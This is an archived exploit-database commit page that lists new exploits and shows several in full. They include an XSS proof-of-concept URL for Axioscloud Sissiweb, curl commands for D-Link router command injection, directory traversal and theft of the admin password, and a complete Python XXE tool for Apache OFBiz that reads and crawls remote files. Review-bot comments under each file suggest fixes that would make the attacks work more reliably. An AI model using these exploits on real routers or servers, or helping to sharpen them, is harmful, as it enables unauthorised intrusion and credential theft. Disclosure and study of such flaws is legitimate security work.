This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
Commit
15 changes to exploits/shellcodes

- Adult Filter 1.0 - Denial of Service (PoC)
- Microsoft Data Sharing - Local Privilege Escalation (PoC)
- Webmin 1.5 - Web Brute Force (CGI)
- exim 4.90 - Remote Code Execution
- School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
- SIM-PKH 2.4.1 - 'id' SQL Injection
- MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
- School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
- SIM-PKH 2.4.1 - 'id' SQL Injection
- MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
- SG ERP 1.0 - 'info' SQL Injection
- Fifa Master XLS 2.3.2 - 'usw' SQL Injection
- Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
- LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting
- Apache OFBiz 16.11.04 - XML External Entity Injection
- D-Link Routers - Command Injection
- D-Link Routers - Plaintext Password
- D-Link Routers - Directory Traversal
- Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
Offensive Security committed on Oct 25, 2018
1 parent: 4f60a3d
commit: dac8dd4
Showing 15 changed files with 1,127 additions and 4 deletions.
@@ -0,0 +1,13 @@ | ||
# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting | ||
# Dork: n/a | ||
# Date: 2018-10-11 | ||
# Exploit Author: Dino Barlattani | ||
# Vendor Homepage: http://axiositalia.it/ | ||
# Software Link: http://axiositalia.it/?page_id=1907 | ||
# Version: 1.7.0/7.0.0 | ||
# Category: Webapps | ||
# Platform: ASPX | ||
# CVE: N/A | ||
|
||
# POC: | ||
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters= |
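Review bot: the `# Version:` header says `1.7.0/7.0.0` while the `# Exploit Title:` line names only `7.0.0`; if 1.7.0 is a separately affected release, list it in the title as well, otherwise drop it. The title also spells the parameter `'Error_desc'` while the PoC URL uses `Error_Desc`; align the two. Since the PoC line is the whole description, add one sentence stating that this is reflected XSS: the `Error_Desc` value is echoed unencoded into the `relogoff.aspx` response, so the injected `<body onload="alert('ok');">` runs in the victim's browser.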
@@ -0,0 +1,23 @@ | ||
## Shell command injection | ||
CVE: CVE-2018-10823 | ||
|
||
CVSS v3: 9.1 | ||
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H | ||
|
||
Description: An issue was discovered on D-Link routers: | ||
|
||
DWR-116 through 1.06, | ||
DWR-512 through 2.02, | ||
DWR-712 through 2.02, | ||
DWR-912 through 2.02, | ||
DWR-921 through 2.02, | ||
DWR-111 through 1.01, | ||
and probably others with the same type of firmware. | ||
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. | ||
|
||
PoC: | ||
|
||
Login to the router. | ||
Request the following URL after login: | ||
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd` | ||
See the passwd file contents in the response. |
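Review bot: the PoC curl line does not carry the session that the text says is required. "Login to the router" is listed as a step, but the command sends no cookie or credential, so as written it never reaches the authenticated `chkisg.htm` handler; add whatever the firmware expects (a `-b` cookie or a `-u user:pass` option) or say how the session is supplied. Also, `?` is encoded as `%3F` and `=` as `%3D`, so the request line is one path component `chkisg.htm?Sip=1.1.1.1 | cat /etc/passwd` rather than a path plus a query string; if the device's URL decoder is what makes this work, say so, otherwise send a literal `?` and `=` and encode only the spaces and the pipe. The CVSS vector `AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` does compute to 9.1, so that line is fine.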
@@ -0,0 +1,24 @@ | ||
## Password stored in plaintext | ||
CVE: CVE-2018-10824 | ||
|
||
Description: | ||
|
||
An issue was discovered on D-Link routers: | ||
|
||
DWR-116 through 1.06, | ||
DIR-140L through 1.02, | ||
DIR-640L through 1.02, | ||
DWR-512 through 2.02, | ||
DWR-712 through 2.02, | ||
DWR-912 through 2.02, | ||
DWR-921 through 2.02, | ||
DWR-111 through 1.01, | ||
and probably others with the same type of firmware. | ||
NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple | ||
|
||
The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access. | ||
|
||
PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822 | ||
|
||
`$ curl http://routerip/uir//tmp/XXX/0` | ||
This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication. |
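Review bot: the PoC cannot run as written and the file should say so next to it: `/tmp/XXX/0` is the redacted path the NOTE explains, so `curl http://routerip/uir//tmp/XXX/0` returns nothing until the reader substitutes the real directory name. Unlike the command-injection and directory-traversal write-ups in this commit, this one has no `CVSS v3:` line; add one for consistency. The response is described as a binary config file, so a sentence on how the admin username and password are located inside it would make "full router access" reproducible rather than asserted.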
@@ -0,0 +1,27 @@ | ||
Directory Traversal | ||
CVE: CVE-2018-10822 | ||
|
||
CVSS v3: 8.6 | ||
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N | ||
|
||
Description: Directory traversal vulnerability in the web interface on D-Link routers: | ||
|
||
DWR-116 through 1.06, | ||
DIR-140L through 1.02, | ||
DIR-640L through 1.02, | ||
DWR-512 through 2.02, | ||
DWR-712 through 2.02, | ||
DWR-912 through 2.02, | ||
DWR-921 through 2.02, | ||
DWR-111 through 1.01, | ||
and probably others with the same type of firmware | ||
allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. | ||
|
||
NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190. | ||
|
||
PoC: | ||
|
||
`$ curl http://routerip/uir//etc/passwd` | ||
The vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824. | ||
|
||
This vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash. |
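Review bot: the description claims traversal via both `/..` and `//` after `GET /uir`, but the PoC shows only the `//` form (`curl http://routerip/uir//etc/passwd`); add the `/..` variant as a second line so both claims are demonstrated, or drop `/..` from the description. The heading `Directory Traversal` is missing the `##` that the other two D-Link files in this commit use. In the last paragraph, "can be exploited not only ... by double dot but also absolutely using double slash" is hard to parse; "but also by an absolute path after a double slash" is what the PoC shows. The `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N` vector does compute to 8.6, so that line is consistent.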
@@ -0,0 +1,125 @@ | ||
# Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection | ||
# Date: 2018-10-15 | ||
# Exploit Author: Jamie Parfet | ||
# Vendor Homepage: https://ofbiz.apache.org/ | ||
# Software Link: https://archive.apache.org/dist/ofbiz/ | ||
# Version: < 16.11.04 | ||
# Tested on: Ubuntu 18.04.1 | ||
# CVE: N/A | ||
|
||
#!/usr/bin/env python3 | ||
# ***************************************************** | ||
# Type: XML External Entity Injection (File disclosure) | ||
# Target: Apache OFBiz < 16.11.04 | ||
# Author: Jamie Parfet | ||
# ***************************************************** | ||
import sys | ||
import os | ||
import requests | ||
import urllib3 | ||
import re | ||
import argparse | ||
|
||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | ||
|
||
simple_payload = """<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://{}">]> | ||
<methodCall><methodName>xXx | ||
&disclose;xXx</methodName></methodCall> | ||
""" | ||
|
||
if len(sys.argv) <= 1: | ||
print('[*] Apache OFBiz < 16.11.04 XXE') | ||
print('[*] Use "%s -h" to display help.' % (sys.argv[0])) | ||
exit(0) | ||
|
||
|
||
parser = argparse.ArgumentParser() | ||
parser.add_argument("-u", | ||
metavar="https://localhost:8443", | ||
dest="url", | ||
required=True, | ||
help="Target URL (required)", | ||
action='store') | ||
parser.add_argument("-f", | ||
metavar="/etc/passwd", | ||
dest="file", | ||
help="Target file", | ||
action='store') | ||
parser.add_argument("-c", | ||
metavar="/home/", | ||
dest="crawl", | ||
help="Target directory to start crawling from", | ||
action='store') | ||
parser.add_argument("-o", | ||
metavar="~/local/output/directory/", | ||
dest="output_dir", | ||
help="Local directory that remote file will be saved to", | ||
action='store') | ||
args = parser.parse_args() | ||
url = args.url if args.url else None | ||
target_file = args.file if args.file else None | ||
crawl_dir = args.crawl if args.crawl else None | ||
output_dir = args.output_dir if args.output_dir else None | ||
|
||
|
||
def check_url(url): | ||
if '://' not in url: | ||
print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url)) | ||
exit(0) | ||
else: | ||
return url | ||
|
||
|
||
def request(url, payload): | ||
response = requests.post(url + '/webtools/control/xmlrpc', data=payload, verify=False).text | ||
parsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response) | ||
return parsed_response | ||
|
||
|
||
def crawl(crawl_dir): | ||
payload = simple_payload.format(crawl_dir) | ||
response = request(url, payload) | ||
payload_404 = simple_payload.format(crawl_dir + "/xX404Xx") | ||
response_404 = request(url, payload_404) | ||
if 'No such file or directory' in response: | ||
print("[-] ERROR - 404: {}".format(crawl_dir)) | ||
elif 'Permission denied' in response or 'but is not accessible' in response: | ||
print("[-] ERROR - Permission: {}".format(crawl_dir)) | ||
elif 'Not a directory' in response_404: | ||
print("[*] FILE: {}".format(crawl_dir)) | ||
else: | ||
print("[*] DIR: {}".format(crawl_dir)) | ||
for f in response.splitlines(): | ||
full_path = (crawl_dir + '/' + f) | ||
crawl(full_path) | ||
|
||
|
||
def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir): | ||
if url: | ||
check_url(url) | ||
if crawl_dir: | ||
crawl(crawl_dir) | ||
else: | ||
payload = simple_payload.format(target_file) | ||
if output_dir: | ||
if os.path.isdir(output_dir): | ||
result = request(url, payload) | ||
remote_file_name = re.sub('/', '--', target_file) | ||
output_file = (output_dir + '/' + remote_file_name[2:]) | ||
file = open(output_file, 'w') | ||
file.write(result) | ||
file.close() | ||
else: | ||
print("[-] ERROR: {} is not a writeable directory".format(output_dir)) | ||
else: | ||
result = request(url, payload) | ||
print(result) | ||
|
||
|
||
if __name__ == '__main__': | ||
try: | ||
main() | ||
except KeyboardInterrupt: | ||
print('\nKeyboard interrupt detected.') | ||
print('Exiting...') | ||
exit(0) |
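Review bot: the `# Exploit Title:` line says `Apache OFBiz 16.11.04` is affected, while `# Version:` and the `# Target:` comment say `< 16.11.04`, which makes 16.11.04 the fixed release; state the affected range once and consistently. In `main()`, when neither `-f` nor `-c` is given, `simple_payload.format(target_file)` is built with `target_file = None`, so the tool posts `file://None` to `/webtools/control/xmlrpc`; make the two options a required mutually exclusive group in `argparse` or exit with a message. Smaller points: `check_url()` exits with status 0 on a bad URL and its return value is discarded by the caller, an error path should exit non-zero; `crawl()` recurses with no depth limit, so `-c /` walks the entire target filesystem including `/proc`; and `open(output_file, 'w')` writes the decoded text, which will mangle any non-UTF-8 file retrieved with `-f`.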